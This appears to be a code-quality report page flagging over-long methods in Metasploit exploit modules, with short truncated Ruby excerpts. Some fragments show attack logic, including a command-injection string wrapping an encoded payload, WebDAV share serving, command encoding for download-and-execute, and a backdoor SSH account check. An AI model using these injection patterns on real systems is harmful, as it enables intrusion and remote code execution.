Showing 15,831 of 21,886 total issues
Method initialize
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability
Method on_request_uri
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_request_uri(cli, request)
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending #{self.name}")
Method generate_shares
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def generate_shares(path)
share_name = @share_name
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
Method process_get
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def process_get(cli, request)
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav = "\\\\#{myhost}\\"
if blacklisted_path?(request.uri)
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
template = [
"[Content_Types].xml",
"_rels/.rels",
"docProps/thumbnail.jpeg",
Method on_file_read
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_file_read(fname, file)
f = open(file, 'rb')
buf = f.read
f.close
Method make_ttf
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def make_ttf
ttf_data = ""
# load the static ttf file
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
template = %Q|<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
<title>Playlist</title>
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
peer = "#{rhost}:#{rport}"
# Setup the necessary files to do the wbemexec trick
Method generate_shares
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def generate_shares(path)
share_name = datastore['SHARENAME']
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
if !datastore['ForceExploit'] && is_root?
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
end
Method api_key
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def api_key
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api/'),
'vars_get' => {
Method execute_command
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def execute_command(cmd, _opts = {})
# we need to percent encode the entire command.
# however, the + character cannot be used and percent encoding does not help for it. so we need to change chmod +x with chmod 744
cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))
start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data
Method check
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def check
# For this exploit to work, we need to check two services:
# * HTTP - To create the backdoor account for SSH
# * SSH - To execute our payload
Method add_device
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def add_device(cookies)
add_uri = normalize_uri(target_uri.path, 'addhost')
@hostname = Rex::Text.rand_text_alpha(6...12)
comm_payload = "'; #{payload.encoded}#'"
Method initialize
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Continuum Arbitrary Command Execution',
'Description' => %q{
This module exploits a command injection in Apache Continuum <= 1.4.2.
Method exploit
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
cookie = auth
csrf_token = get_csrf_token(cookie)
Method execute_command
has 27 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def execute_command
case target.name
when 'ELASTIC'
request = {
'uri' => normalize_uri(target_uri.path, '.kibana_1', '_doc', 'upgrade-assistant-telemetry:upgrade-assistant-telemetry'),